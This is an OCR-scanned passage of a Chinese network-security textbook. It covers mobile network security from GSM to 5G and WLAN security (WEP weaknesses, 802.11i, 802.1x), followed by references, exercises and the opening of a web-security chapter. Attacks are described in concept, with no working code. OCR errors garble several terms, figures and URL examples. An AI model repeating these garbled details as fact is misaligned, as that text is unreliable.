进行 的 数据 通信 ,覆盖 范围 最 大 。 代 表 技 术 有 3G(3th Generation ,第 三 代 移 动 通信 ) 、4G 
(4th Generation, 第 四 代 移 动 通信 ) 等 ,数据 传输 速率 一 般 在 3Mb/s 以 上 。 

(2) 无 线 城 域 网 (Wireless metropolitan area network,WAN): 主要 是 指 通 过 移动 电 
话 或 车 载 装置 进行 的 移动 数据 通信 ,可 以 覆盖 城市 中 大 部 分 的 地 区 ,代表 技术 是 IEEE 
802. 16 系列 标准 。 

(3) 无 线 局 域 网 (Wireless local area network, WLAN): 一 般 用 于 区 域 间 的 无 线 通 
信 , 其 覆盖 范围 较 小 。 代 表 技 术 是 IEEE 802. 11 系列 标准 。 数 据 传输 速率 在 11 一 56Mbys 
之 间 , 甚 至 更 高 。 

(4) 无 线 个 人 网 (Wireless personal area network, WPAN) : 无 线 传输 距离 一 般 在 
10m 左右 ,典型 技术 是 IEEE 802. 15 和 蓝牙 (Bluetooth) 技 术 ,数据 传输 速率 在 10Mb/s 
以 上 。 

2. 无 线 网 络 安全 威胁 

无 线 网 络 扩展 了 用 户 的 自由 空间 ,网 络 结构 方便 .灵活 ,可 以 提供 无 线 覆 盖 范 围 内 的 
全 功能 漫游 服务 。 但 是 这 种 自由 也 同时 带 来 了 新 的 挑战 ,而且 由 于 无 线 通 信 设 备 在 存储 
能 力 、 计 算 能 力 和 电源 供电 时 间 等 方面 的 局 限 性 ,使 得 原来 在 有 线 环境 下 的 许多 安全 方案 
和 安全 技术 不 能 直接 应 用 ,例如 计算 量 大 的 加 解密 算法 等 。 因 此 ,与 有 线 网 络 相 比 ,无 线 
网 络 面临 更 加 严重 、 更 加 复杂 的 安全 威胁 。 

(1) 无 线 窃 听 。 在 无 线 网 络 中 ,所 有 网 络 通信 内 容 , 如 移动 用 户 的 通话 信息 、 身 份 信 
息 、 位 置信 息 、 数 据 信息 以 及 移动 站 与 移动 站 与 网 络 控制 中 心 之 间 的 信 令 信息 等 ,都 是 通 
过 无 线 信 道 传送 的 。 无 线 信 道 的 开放 特性 ,使 得 窃听 更 加 容易 ,只 需要 适当 的 无 线 接收 设 
备 即 可 ,而 且 很 难 被 发 现 。 虽 然 有 线 通信 网 络 也 可 能 会 遭 到 搭 线 窃 听 , 但 是 需要 能 接触 到 
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被 窃听 的 通信 电缆 ,并 进行 一 些 专门 的 处 理 , 很 容易 被 发 现 。 

(2) 假冒 攻击 。 在 无 线 网 络 中 ,移动 站 (包括 移动 用 户 和 移动 终端 ) 要 进行 身份 鉴别 ， 
必须 通过 无 线 信道 向 网 络 控制 中 心 以 及 其 他 移动 站 传送 其 身份 信息 。 如 果 这 些 信 息 被 攻 
击 者 截获 ,他 就 可 能 利用 这 个 身份 信息 假冒 该 合法 用 户 的 身份 人 网 ,访问 网 络 资源 或 逃避 
付费 ,这 就 是 身份 假冒 攻击 。 主 动 攻击 者 甚至 可 以 假冒 基站 欺骗 移动 用 户 。 

(3) 信息 复 改 。 在 移动 通信 网 中 ,当主 动 攻击 者 比 移动 用 户 更 接近 基站 时 ,主动 攻击 
者 所 发 射 的 信号 要 比 移动 用 户 的 强 很 多 倍 , 使 得 基站 忽略 移动 用 户 发 射 的 信号 , 转 而 接收 
主动 攻击 者 的 信号 ,主动 攻击 者 就 可 以 算 改 移动 用 户 的 信息 后 再 传 给 基站 。 

(4) 服务 抵赖 。 交 易 双 方 中 的 一 方 在 交易 完成 后 否认 其 参与 了 此 交易 。 例 如 ,在 无 
线 通 信和 网 络 中 ,用 户 需要 付费 来 获取 服务 提供 商 提供 的 无 线 网 络 服务 ,该 应 用 存在 着 两 种 
服务 后 抵赖 的 威胁 : 用 户 使 用 了 无 线 网 络 却 拒绝 付费 ;服务 提供 商 明 明 收 了 服务 费 却 拒 
绝 提供 网 络 服务 。 

(5) 重 放 攻击 。 攻 击 者 企图 利用 一 个 旧 的 曾经 有 效 的 信息 达到 访问 系统 资源 的 
目的 。 

(6) 其 他 安全 威胁 。 无 线 通 信 网 络 与 有 线 通 信 网 络 一 样 , 也 面临 着 病毒 .拒绝 服务 攻 
击 等 威胁 。 
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移动 通信 网 络 经 历 了 几 个 发 展 阶段 : 第 一 代 移 动 通信 系统 采用 模拟 技术 ,已 经 基本 
被 淘汰 ;第 二 代 移 动 通信 完成 了 模拟 技术 向 数字 技术 的 转变 ,但 仍 以 语音 通信 为 主 , 同 时 
有 少量 的 数据 通信 ;第 三 代 移动 通信 (3G) 以 媒体 业务 和 宽带 数据 业务 为 主 :第 四 代 移 动 
通信 (4G) 与 第 三 代 移 动 通信 技术 相 比 ,除了 通信 速率 大 为 提高 外 ,还 借助 IP 进行 通话 。 

1. 2G 移动 通信 网 络 

第 二 代 移 动 通信 网 络 (2G) 主要 采用 数字 的 时 分 多 址 (time division multiple access， 
TDMA) 和 码 分 多 址 (code division multiple access,CDMA) 技 术 提 供 数字 化 的 语音 业务 
及 低速 数据 业务 。 代 表 性 的 2G 系统 是 全 球 移动 通信 系统 (global system for mobile 
communication,GSM) ,是 欧洲 电信 标准 协会 制定 的 可 国际 漫游 的 泛 欧 数字 蜂窝 系统 
标准 。 

GSM 系统 是 第 一 个 引入 安全 机 制 的 移动 通信 系统 ,提供 的 安全 措施 主要 包括 : 

(1) 用 户 真 实 身份 和 位 置信 息 的 机 密 性 保护 。 

(2) 防止 未 授权 的 非法 用 户 接 入 的 认证 技术 。 

(3) 防止 在 空中 接口 非法 用 户 窃听 的 加 解密 技术 。 

用 户 首先 要 在 网 络 服务 提供 商 处 登记 ,服务 商 为 该 用 户 分 配 唯一 的 国际 移动 身份 
(International Mobile Subscriber Identity,IMSI 和 一 个 根 密 钥 , 存 人 SIM 卡 交 给 用 户 。 
用 户 在 发 送 认 证 请 求 时 ,通过 临时 识别 符 TMSI 对 用 户 身份 进行 保密 ,在 VLR(Visitor 
Location Register) 处 存储 TMSI 和 IMSI 的 对 应 关系 。 在 用 户 开机 或 VLR 数据 丢失 时 ， 
需要 用 户 发 送 IMSI, 平 时 只 需 发 送 TMSI, 认 证 成 功 后 更 新 TMSI。 

GSM 系统 提供 了 认证 机 制 和 加 密 机 制 。 用 户 入 网 时 获得 的 SIM 中 包含 IMSI 和 根 
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密 钥 KK, 认证 中 心 (Authentication Center, AUC) 也 存 有 用 户 的 根 密 钥 KK。 基于 IMSI 和 
二 者 共享 的 根 密 钥 KK, 对 用 户 持 有 的 MS(Mobile Station) 进 行 认证 ,并 建立 加 密 密 钥 KC， 
并 将 其 传递 给 基站 BTS。 此 后 从 MS 到 基站 之 间 的 无 线 信道 就 可 以 用 加 密 的 方式 传递 
信息 ,从 而 防止 窃听 。 但 是 ,GSM 系统 的 安全 机 制 仍然 存在 一 些 安全 缺陷 : 

(1) 单 向 认证 。GSM 只 有 网 络 对 用 户 的 认证 ,而 没有 用 户 对 网 络 的 认证 ,因而 会 存 
在 伪 基站 攻击 。 

(2) 根 密 钥 无 更 新 机 制 。 用 户 SIM 卡 中 存储 的 根 密 钥 K 无 法 进行 更 新 ,缺乏 灵活 
性 ,不 利于 对 根 密 钥 的 保护 。 

(3) 无 完整 性 保护 。GSM 中 移动 台 和 网 络 间 的 信 令 消息 没有 数据 完整 性 保护 ,系统 
很 难 发 现在 传输 过 程 中 是 否 被 算 改 、 删 除 或 重 放 。 

(4) 加 密 算法 的 安全 性 。GSM 系统 中 的 加 密 算法 是 不 公开 的 ,不 能 得 到 客观 的 分 析 
和 评价 ,在 实际 中 也 受到 了 很 多 攻击 。 并 且 没 有 更 多 的 算法 可 供 选择 ,缺乏 算法 协商 和 加 
密 密 钥 协商 的 过 程 。 

(5) SIM 卡 克隆 。SIM 卡 中 存放 了 用 户 的 重要 秘密 信息 IMSI 和 根 密 钥 K ,移动 台 
第 一 次 注册 和 漫游 时 ,IMSI 以 明文 形式 发 送 ,因此 易 被 攻击 者 窃取 。 同 时 ,利用 GSM 单 
向 认证 缺陷 ,向 移动 台 发 送 大 量 挑战 ,分 析 协 议 消息 而 破解 根 密 钥 K, 从 而 克隆 SIM 卡 。 

2. 3G 移动 通信 网 络 

3G 移动 通信 网 络 寻 址 方式 是 码 分 多 址 (CDMA) ,在 传输 声音 和 数据 的 速度 上 有 很 
大 提升 ,能 够 在 全 球 范围 内 更 好 的 实现 无 线 漫游 ,处 理 图 像 , 音 乐 、 视 频 流 等 多 媒体 形式 ， 
提供 包括 网 页 浏览 .电话 会 议 . 电 子 商 务 等 多 种 信息 服务 。2000 年 5 月 ,国际 电信 联盟 确 
立 了 三 个 主流 的 3G 通信 无 线 接口 标准 ,并 且 将 这 三 个 标准 写 人 了 3G 技术 指导 性 文件 
中 ,它们 分 别 是 美国 倡导 的 CDMA2000 标准 、 欧 洲 提出 的 WCDMA 标准 以 及 中 国 大 唐 电 
信 公 司 主 推 的 TD-SCDMA 标准 。 

3GPP(3th generation partnership project) 是 国际 上 关于 3G 的 标准 化 组 织 , 其 成 员 
是 各 大 移动 通信 公司 ,其 中 SA3 工作 组 专门 负责 3G 移动 通信 和 网络 安全 标准 的 制定 。 

3G 移动 通信 系统 的 安全 体系 是 在 GSM 安全 体系 基础 上 建立 起 来 的 ,改进 了 GSM 
系统 中 存在 的 缺陷 ,同时 针对 3G 系统 的 新 特性 ,增加 了 更 加 完善 的 安全 机 制 和 服务 : 

(1) 提供 了 增强 的 用 户 身 份 保密 机 制 。 增 强 的 用 户 身份 保密 机 制 (Enhanced User 
Identity Confidentiality, EUIC) 定 义 了 用 于 实现 用 户 身 份 加 密 和 解密 的 算法 和 结 点 
(UIDN)。IMSI 不 再 以 明文 传输 ,而 是 加 密 后 传输 ,从 而 防止 被 窃听 。 

(2) 提供 了 双向 认证 。 不 但 提供 了 基站 对 移动 台 的 认证 ,也 提供 了 移动 台 对 基站 的 
认证 ,可 有 效 防止 伪 基 站 攻击 。 认 证 完成 后 双方 计算 出 数据 加 密 密 钥 CK 和 数据 完整 性 
密 钥 IK ,为 下 一 步 数据 传输 做 准备 。 

(3) 提供 了 接 入 链 路 信 令 数据 的 完整 性 保护 。 当 移动 用 户 与 网 络 之 间 的 安全 通信 模 
式 建立 后 ,所 有 发 送 的 消息 都 将 被 保护 ,包括 接 入 链 路 数据 的 完整 性 保护 和 机 密 性 保护 。 
利用 完整 性 算法 f, 输 入 完整 性 密 钥 IK、 序 列 号 COUNT、 用 于 防止 重 放 的 随机 数 
FRESH , 信 令 数据 MESSGE、 消 息 发 送 方向 位 DIRECTION ,计算 认证 码 MAC, 保 证 消 
息 的 完整 性 。 
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(4) 提供 了 密码 算法 的 协商 机 制 。3G 系统 中 预 留 了 15 种 加 密 算 法 和 16 种 完整 性 
算法 供 选择 ,增加 了 灵活 性 ,不 同 的 运营 商 之 间 只 要 支持 同一 种 加 密 算法 /完整 性 算法 ,就 
可 以 实现 跨 网 通信 。 

虽然 3G 系统 的 安全 体系 更 加 趋 于 完善 ,但 仍 存 在 一 些 问 题 需要 解决 。3G 系统 难以 实现 
用 户 数字 签名 。 随 着 移动 电子 商务 的 广泛 应 用 ,需要 系统 提供 非 否 认 安全 服务 ,该 服务 一 般 通 
过 数字 签名 机 制 来 实现 。3G 系统 中 密 钥 产生 机 制 和 认证 机 制 仍然 存在 一 定 的 安全 隐患 。 

3. 4G 移动 通信 网 络 

第 四 代 移 动 通信 系统 (4G) 以 OFDM 技术 为 核心 技术 , 它 是 多 载波 传输 的 一 种 。4G 
采用 单一 的 全 球 范围 的 蜂窝 核 心 网 来 取代 3G 中 密密麻麻 的 蜂窝 网 络 , 采 用 全 数字 全 IP 
技术 ,支持 不 同 的 接 入 方式 ,如 IEEE 802. 11a、WCDMA、 蓝 牙 等 ,不 管 是 上 行 速度 还 是 下 
行 速度 都 有 了 显著 提高 。4G 移动 通信 系统 的 核心 网 是 一 个 基于 全 IP 的 网 络 , 即 基于 IP 
的 承载 机 制 . 基 于 IP 的 网 络 维护 管理 .基于 IP 的 网 络 资源 控制 .基于 IP 的 应 用 服务 。 

同 3G 移动 网 络 相 比 ,4G 系统 具有 根本 性 的 优点 : 可 以 实现 不 同 的 网 络 间 的 无 缝 互 
联 。 核 心 网 独立 于 各 种 具体 的 无 线 接 人 方案 ,能 提供 端 到 端的 IP 业务 ,能 同 已 有 的 核心 
网 和 PSTN 兼容 。 核 心 网 具有 开放 的 结构 ,能 允许 各 种 空中 接口 接 和 核心 网 ;同时 核心 
网 能 把 业务 ,控制 .传输 等 分 开 。 采 用 IP 后 ,所 采用 的 无 线 接 人 方式 和 协议 与 核心 网 络 
(CN) 协 议 , 链 路 层 是 分 别 独立 的 。IP 与 多 种 无 线 接 和 人 协议 相 兼容 ,因此 在 设计 核心 网 络 
时 具有 很 大 的 灵活 性 ,不 需要 考虑 无 线 接 人 究竟 采用 何 种 方式 和 协议 。 

4G 采用 长 期 演进 (LTE) 和 高 级 长 期 演进 (LTE-A) 安 全 架构 ,但 是 目前 的 LTE/ 
LTE-A 仍然 存在 一 些 弱 点 。 

(1) 3GPP LTE 基于 全 IP 的 平坦 结构 导致 易 受 诸如 注入 、 修 改 、 窃 听 等 攻击 。 

(2) 全 IP 网 络 为 恶意 攻击 者 提供 了 更 直接 的 侵入 基站 的 路 径 。 由 于 移动 管理 组 件 
(MME) 管 理 着 大 量 eNBs (evolved Node B, 演 进 型 基站 ), 因 此 与 管理 着 少量 RNCs 
(Radio Network Controller, 无 线 网 络 控制 器 ) 的 UTMS 3G 网 络 相 比 ,LTE 网 络 基 站 更 
易 受 攻击 。 一 旦 攻击 者 侵入 某 个 基站 , 便 可 利用 LTE 的 全 IP 性 质 危 害 整个 网 络 。 

(3) LTE 系统 结构 在 切换 认证 过 程 中 可 能 会 产生 新 的 问题 。 

(4) LTE 采取 的 EPS AKA 方案 缺乏 隐私 保护 机 制 ,不 能 抵抗 DoS 攻击 。 

(5) LTE 切换 过 程 缺乏 后 向 安全 、 易 受 去 同步 攻击 和 重 放 攻 击 。 

4. 5G 移动 通信 网 络 

为 提升 其 业务 支撑 能 力 ,5G 在 无 线 传输 技术 和 网 络 技术 方面 将 有 新 的 突破 。 在 无 线 
传输 技术 方面 ,将 引入 能 进一步 挖掘 频谱 效率 提升 潜力 的 技术 ,如 先进 的 多 址 接 人 技术 、 
多 天 线 技术 、 编 码 调制 技术 .新 的 波形 设计 技术 等 ;在 无 线 网 络 方面 ,将 采用 更 灵活 、 更 智 
能 的 网 络 架 构 和 组 网 技术 ,如 采用 控制 与 转发 分 离 的 软件 定义 无 线 网 络 的 架构 统一 的 自 
组 织 网 络 (SON) 、 异 构 超 密集 部 署 等 。 

5G 移动 通信 标志 性 的 关键 技术 主要 体现 在 超 高 效能 的 无 线 传输 技术 和 高 密度 无 线 
网 络 (high density wireless network) 技术 ,其 中 基于 大 规模 MIMO 的 无 线 传输 技术 将 
有 可 能 使 频谱 效率 和 功率 效率 在 4G 的 基础 上 再 提升 一 个 量 级 ,该 项 技术 走向 实用 化 的 
主要 瓶颈 问题 是 高 维度 信道 建 模 与 估计 以 及 复杂 度 控制 。 
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体系 结构 变革 将 是 新 一 代 无 线 移动 通信 系统 发 展 的 主要 方向 。 现 有 的 扁平 化 SAE/ 
LTE (system architecture evolution/long term evolution) 体系 结构 促进 了 移动 通信 系统 
与 互联 网 的 高 度 融 合 ,高 密度 .智能 化 .可 编程 则 代表 了 未 来 移动 通信 演进 的 进一步 发 展 
趋势 ,而 内 容 分 发 网 络 (CDN) 向 核心 网 络 的 边缘 部 署 .可 有 效 减 少 网 络 访问 路 由 的 负 
荷 ,并 显著 改善 移动 互联 网 用 户 的 业务 体验 。 

(1) 超 密集 组 网 : 未 来 网 络 将 进一步 使 现 有 的 小 区 结构 微型 化 分 布 化 ,并 通过 小 区 
间 的 相互 协作 ,化 干扰 信号 为 有 用 信号 ,最 大 程度 地 提高 整个 网 络 的 系统 容量 。 

(2) 智能 化 : 未 来 网 络 将 在 已 有 SON 技术 的 基础 上 ,具备 更 为 广泛 的 感知 能 力 和 更 
为 强大 的 自 优化 能 力 ,在 异 构 环境 下 为 用 户 提供 最 佳 的 服务 体验 。 

(3) 可 编程 : 未 来 网 络 将 具备 软件 可 定义 SDN) 能 力 ; 基 站 与 路 由 交换 等 基础 设施 
具备 可 编程 与 灵活 扩展 能 力 ,以 统一 融合 的 平台 适应 复杂 的 不同 规 模 的 应 用 场景 。 

(4) 内 容 分 发 边缘 化 部 署 : 移动 终端 访问 的 内 容 虽 然 呈 海量 化 趋势 ,但 大 部 分 集中 
在 一 些 大 型 门户 网 站 ,在 未 来 5G 网 络 中 采用 CDN 技术 将 提高 网 络 资源 利用 率 。 
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无 线 局 域 网 (WLAN) 是 指 利用 无 线 通 信 技 术 将 计算 机 设备 互联 起 来 ,构成 可 以 互相 
通信 和 实现 资源 共享 的 网 络 体 系 。 与 有 线 网 络 相 比 , WLAN 具有 一 定 的 移动 性 、 灵 活性 
高 、 建 网 迅速 ,管理 方便 、 网 络 造价 低 、 扩 展 能 力 强 等 特点 ,因此 比较 适用 于 布线 困难 ,或 者 
需要 在 移动 中 联网 和 网 间 温 游 的 场合 ,在 石油 工业 、 医 护 管理 ,库存 控制 ,会 议 展览 ,移动 
办 公 等 多 个 领域 具有 广泛 的 应 用 。 

随 着 WLAN 的 广泛 应 用 ,人 们 对 其 安全 性 的 需求 也 越 来 越 高 。 目 前 ,针对 WLAN 
安全 性 的 标准 主要 有 : 

(1) IEEE 802. 11 安全 标准 : 使 用 有 线 等 价 保密 (Wired Equivalent Privacy, WEP) 
协议 来 实现 认证 与 数据 加 密 , 其 理想 目标 是 为 WLAN 提供 与 有 线 网 络 相 同 级 别 的 安全 
保护 。 但 是 由 于 这 些 安全 机 制 存在 设计 缺陷 ,并 不 能 提供 足够 的 安全 保护 。 

(2) IEEE 802. 11i 安全 标准 : 针对 WEP 机 制 的 安全 缺陷 ,802. 11i 工作 组 提出 了 一 
系列 的 改进 措施 ,于 2004 年 颁布 。802. 11i 标准 采用 AES 算 法 代替 WEP 机 制 中 的 RC4 
算法 ,使 用 802. 1x 协议 进行 认证 。 

(3) WPACWi-Fi Protected Access): Wi-Fi 联盟 在 IEEE 802. 11i 标准 出 台 之 前 推出 
的 自己 的 一 套 标准 。WPA 标准 的 核心 是 IEEE 802. 1x 认证 协议 和 临时 密 钥 完整 性 协议 
TKII。 

(4) 中 国 无 线 局 域 网 安全 标准 : 我 国 于 2003 年 颁布 的 无 线 局 域 网 国家 标准 
GB15629. 11, 引入 新 的 安全 机 制 一 一 无 线 局 域 网 鉴别 和 保密 基础 结构 (WLAN 
Authentication and Privacy Infrastructure,`WAPI) 。 

1. WLAN 架构 

WLAN 由 无 线 网 卡 、 无 线 接 入 点 (Access Point, AP)、 计 算 机 和 相关 设备 组 成 。 
IEEE 802. 11 标准 支持 两 种 拓扑 结构 (图 7-36): 独立 基本 服务 集 (Independent Basic 
Service Set,IBSS) 和 扩展 服务 集 (Extend Service Set, ESS), 均 使 用 基本 服务 集 (Basic 
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Service Set,BSS) 作 为 基本 组 件 。BSS 提供 一 个 覆盖 区 域 , 使 其 中 的 站 点 保持 充分 的 
连接 。 


至 其 他 802.x 
局 域 


| 


忆 .基本 服务 集 …。 
BSS 


, 
» 
“全 
3 
» 


图 7-36 IEEE 802. 11 的 基本 服务 集 和 扩展 服务 集 


IBSS 是 一 个 独立 的 BSS, 没 有 中 枢 链 路 基础 结构 ,又 称 为 自 组 织 无 线 局 域 网 (Ad 
Hoc WLAN)。ESS 是 由 多 个 AP、 多 个 BSS 通过 分 配 系统 DS 联结 形成 的 结构 化 网 络 。 

2. IEEE 802. 11 安全 机 制 

在 IEEE 802. 11 中 考虑 了 无 线 局 域 网 的 接 人 安全 问题 ,并 提供 了 一 些 身份 认证 . 数 
据 加 密 与 完整 性 验证 等 安全 机 制 。 

(1) 加 密 机 制 。WEP 是 IEEE 802. 11 中 保障 数据 传输 安全 的 核心 。WEP 采用 的 是 
RC4 加 密 算法 ,同时 引入 初始 向 量 IV 和 完整 性 校 验 值 ICV ,以 防止 数据 的 算 改 和 传输 错 
误 。 每 一 个 客户 端 及 AP 中 存储 一 个 相同 的 40 位 长 度 的 密 钥 ,作为 共享 密 钥 来 完成 加 解 
密 。 然 而 由 于 WEP 中 RC4 算法 在 使 用 过 程 中 存在 弱 密 钥 .IV 重用 等 问题 , 易 遭 受 密码 
破解 攻击 ,并 且 已 经 存在 许多 自动 化 的 破解 工具 。 

WEP 使 用 循环 元 余 校 验 码 (CRC-32) 来 验证 传输 数据 的 正确 性 ,然而 CRC 校 验 码 并 
不 能 抵御 数据 算 改 。 

(2) 认证 机 制 。IEEE 802. 11 定义 了 两 种 认证 方式 : 开放 系统 认证 (Open System 
Authentication) 和 共享 密 钥 认 证 (Shared Key Authentication) 。 

开放 系统 认证 是 IEEE 802. 11 的 默认 认证 机 制 ,整个 认证 过 程 以 明文 方式 进行 。 整 
个 过 程 只 有 两 步 : 认证 请 求 和 响应 ,如 图 7-37(a) 所 示 。 通 过 这 种 认证 方式 ,AP 并 不 能 认 
证 STA(Station ,工作 站 ) 的 合法 身份 ,因此 相当 于 是 空 认证 。 

共享 密 钥 认证 是 可 选 的 ,认证 过 程 如 图 7-37(b) 所 示 。STA 提出 认证 请 求 ; AP 收 到 
后 随即 产生 一 个 挑战 字符 串 发 送 给 STA;STA 利用 共享 密 钥 K 通过 WEP 算法 对 挑战 字 
符 串 进行 加 密 ,产生 的 密 文 作为 对 挑战 的 响应 发 送 给 AP; AP 利用 共享 密 钥 K 解密 并 验 
证 挑战 字符 串 是 否 一 致 ,车 一 致 则 认证 成 功 ,否则 认证 失败 。 

IEEE 802. 11 中 的 共享 密 钥 认证 机 制 是 单 向 的 ,使 得 伪装 AP 的 攻击 很 容易 实现 ,并 
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客户 端 AP 客户 端 AP 
认证 请 求 
认证 请 求 
认证 响应 (挑战 ) 
认证 (加 密 的 挑战 ) 
1 
认证 响应 (成 功 ) 
(a) 开放 系统 认证 (b) 共享 密 钥 认证 


图 7-37 802.11 认证 机 制 


且 存 在 会 话 劫持 和 中 间 人 攻击 的 可 能 性 。 

3. IEEE 802. 11i 安全 机 制 

为 了 进一步 加 强 无 线 网 络 的 安全 性 ,IEEE 802. 11 工作 组 开发 了 新 的 安全 标准 IEEE 
802. 11i, 将 安全 解决 方案 升级 为 WPA2 ,在 身份 认证 .加 密 机 制 、 数 据 包 检查 方面 增强 了 
安全 性 ,并 提升 了 无 线 网 络 的 管理 能 力 。 

(1) 加 密 机 制 。IEEE 802. 11i 定义 了 TKIP(Temporal Key Integrity Protocol) 和 
CCMP(Counter-mode/ CBC-MAC Protocol) 两 种 加 密 机 制 。 其 中 TKIP 是 一 种 过 渡 算 
法 , 仍 采用 RC4 作为 核心 加 密 算法 ,但 将 初始 向 量 IV 扩展 到 48 比特 .增加 消除 弱 密 钥 机 
制 、 利 用 消息 完整 性 代码 MIC 防止 数据 被 算 改 ,在 一 定 程度 上 提高 了 破解 难度 。CCMP 
机 制 基于 高 级 加 密 标 准 AES 加 密 算法 和 CCM 认证 方式 ,采用 计数 器 模式 (CTR) 和 完整 
性 校 验 模 式 (CBC-MAC) 进 行 数据 保护 ,是 IEEE 802. 11i 最 强 的 安全 算法 ,能 够 更 好 地 解 
决 WLAN 安全 问题 。 

(2) 认证 机 制 。IEEE 提出 IEEE 802. 1x 协议 来 解决 IEEE 802. 11 认证 机 制 中 存在 
的 安全 缺陷 。IEEE 802. 1x 提供 了 可 靠 的 用 户 认 证 和 密 钥 分 发 的 框架 ,核心 是 可 扩展 认 
证 协议 (Extensible Authentication Protocol,EAP)。EAP 协议 是 一 种 封装 协议 ,在 具体 
应 用 中 可 以 根据 不 同 的 认证 方法 进行 扩展 ,可 选 EAP-TLS、PEAP、EAP-SIM 等 ,最 常见 
的 是 EAP-TLS, 已 经 成 为 国际 标准 RFC 2716。 

EAP-TLS 协议 基于 TLS 实现 ,要 求 双方 都 有 公 角 证书, 服务 器 与 客户 的 双向 认证 是 
通过 公 钥 证 书 , 进 行 TLS 建立 会 话 密 钥 。 该 协议 不 对 用 户 身 份 进行 保护 ,可 以 被 攻击 者 
窃听 。 该 协议 在 STA 和 认证 服务 器 间 实 现 双向 身份 认证 ,AP 被 错误 地 认为 是 可 信任 的 
实体 ,缺乏 对 AP 的 认证 ,有 遭受 假冒 AP 攻击 的 可 能 。 


7.6 本 章 小 结 
本 章 首先 对 网 络 安全 威胁 和 几 种 主要 的 网 络 安全 控制 技术 进行 了 详细 描述 ,包括 数 


据 加 密 、 虚 拟 专 有 网 .PKI 与 证 书 、 身 份 鉴别 和 访问 控制 ;其 次 ,对 防火 墙 \ 入 侵 检测 系统 和 
虚拟 专 有 网 进行 了 详细 研究 ,包括 防火 墙 的 体系 结构 、 防 火 墙 的 配置 实例 IDS 的 功能 及 
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类 型 .虚拟 专 有 网 的 类 型 和 协议 ;最 后 ,研究 了 无 线 网 络 安全 ,包括 移动 通信 网 络 安全 和 无 
线 局 域 网 安全 。 


参考 文献 


[1] Charles P. Pfleeger,Shari Lawrence Pfleeger. 李 孝 超 , 蔡 洪 斌 , 谭 浩 , 译 . 信息 安全 原理 与 应 用 (第 
4 版 ). 北京 : 电子 工业 出 版 社 ,2007. 

[2] William Stallings. 白 国 强 , 译 . 网 络 安全 基础 : 应 用 与 标准 (第 5 版 ). 北京 : 清华 大 学 出 版 
社 ,2014. 

[3] Douglas Jacobson。 仰 礼 友 , 赵 红 宇 , 译 . 网 络 安全 基础 : 网 络 攻防 ,协议 与 安全 . 北京 : 电子 工业 出 
版 社 ,2011. 

4] Eric Cole. 曹 继 军 , 林 龙 信 , 译 . 网 络 安全 宝典 (第 2 版 ). 北京 : 清华 大 学 出 版 社 ,2010. 

5] 王 秀 利 . 网 络 拥塞 控 制 及 拒绝 服务 攻击 防范 . 北京 : 北京 邮电 大 学 出 版 社 ,2009. 

[6] 胡 道 元 , 闵 京华 . 网 络 安全 (第 2 版 ). 北京 : 清华 大 学 出 版 社 ,2008. 
8 


冯 登 国 , 徐 静 . 网 络 安全 原理 与 技术 (第 2 版 ). 北京 : 科学 出 版 社 ,2010. 

S. Bellovin. Security Problems in the TCP/IP Protocol Suite. Computer Communication Review, 
1989,19(2): 32-48. 

[9] M. Andrews,]J. A. Whittaker. How to Break Web Software. Boston: Addison-Wesley,2006. 
[10] ActivNewsletter. Lloyd's TSB Secures Online Banking Services with ActivCardGold. http:// 


www. activcard. com/activ/newsroom/newsletter/0202_edition/llods. html. 


[11] 朱 建 明 , 马 建 峰 . 无 线 局 域 网 安全 一 一 方法 与 技术 (第 2 版 ). 北京 : 机 械 工业 出 版 社 ,2009. 


1. 你 的 个 人 计算 机 以 前 或 现在 是 僵尸 吗 ? 后 果 如 何 ? 如 果 你 是 一 位 系统 管理 员 , 正 
在 查找 你 管理 的 网 络 中 的 僵尸 ,你 会 查找 些 什么 ? 

2. 什么 是 中 间 人 攻击 ? 请 举 出 一 个 实际 生活 中 存在 这 种 攻击 的 例子 (不 要 举 来 自 于 
计算 机 网 络 方面 的 例子 ) 。 假 设 有 一 种 方法 能 够 让 发 送 者 和 接收 者 排除 中 间 人 攻击 。 

(1) 请 举 出 一 种 不 使 用 加 密 的 方法 ; 

(2) 请 举 出 一 种 使 用 了 加 密 但 也 能 保证 中 间 人 不 能 在 密 钥 交换 过 程 中 实施 这 种 攻击 
的 方法 。 

3. 你 是 否 应 用 过 VPN? 请 举例 。 

4. 一 些 人 认为 对 PKI 进行 证 书 授权 应 该 由 政府 来 做 ,而 其 他 人 认为 证 书 授权 应 该 由 
一 些 私有 实体 一 一 比如 银行 ,企业 或 学 校 来 做 。 这 两 种 方案 各 有 什么 优 缺 点 ? 

5. 你 的 个 人 计算 机 上 是 否 装 有 防火 墙 7 如 果 有 ,进行 了 哪些 设置 ? 你 能 举 出 几 种 流 
行 的 个 人 防火 墙 ? 

6. 你 的 个 人 计算 机 上 是 否 装 有 入 侵 检测 系统 ? 为 什么 ? 你 能 举 出 几 种 流行 的 入 侵 
检测 系统 ? 
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本 章 学 习 要 点 : 

如 HTML 协议 以 及 请 求 与 响应 的 报 文 结构 ; 

局 Cookie 的 功能 及 其 安全 的 重要 性 ; 

如 SQL 注入 的 原理 和 分 类 ; 

司 XSS 跨 站 脚本 攻击 的 原理 ,分 类 ,特别 是 利用 XSS 获取 Cookie 进行 会 话 动 持 。 


8.1 前 端 基 础 


系统 介绍 ,了 解 HTML 的 世界 ， 


首先 有 必要 将 可 能 涉及 的 语言 基础 部 分 在 本 章 进行 
脚本 、 样 式 、 图 片 , 多 媒体 等 这 些 资源 如 何 运 作 ,然后 学 习 号 称 跨 站 之 魂 的 JavaScript 脚本 
如 何 打破 Web 的 逻辑 。 
8tt -Ut 


URL 就 是 经 常 提 到 的 链接 ,通过 URL 请 求 可 以 查 到 唯一 的 资源 ,格式 如 下 : 

< scheme> ://< netloc> /< path> x query> #< fragment> 

比如 ,下 面 是 一 个 最 普通 的 URL: 

http://www. fo0.com/path/f.php?id= lgtype= co0l#new 

对 应 关系 是 : 

< scheme> -http 

< netloc> - www.foo.com 

<path> - /pathyf.Fhp 

<query> - ic l&type= cool, 包 括 < 参数 名 = 参数 值 > 对 

< fragment> - new 

对 于 需要 HTTP Basic 认证 的 URL 请 求 ,甚至 可 以 将 用 户 名 与 密码 直接 放 入 URL 
中 ,位 于 一 netloc 二 之 前 : 

http://usermname:passworde www.foo.comy 

我 们 接触 最 多 的 是 HTTP/HTTPS 协议 的 URL, 这 是 Web 安全 的 入 口 点 ,各 种 安 
全 威胁 都 伴随 着 URL 的 请 求 而 进行 的 .如 果 客 户 端 到 服务 端 各 层 的 解析 没 做 好 ,就 可 能 
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出 现 问 全 问题 。 
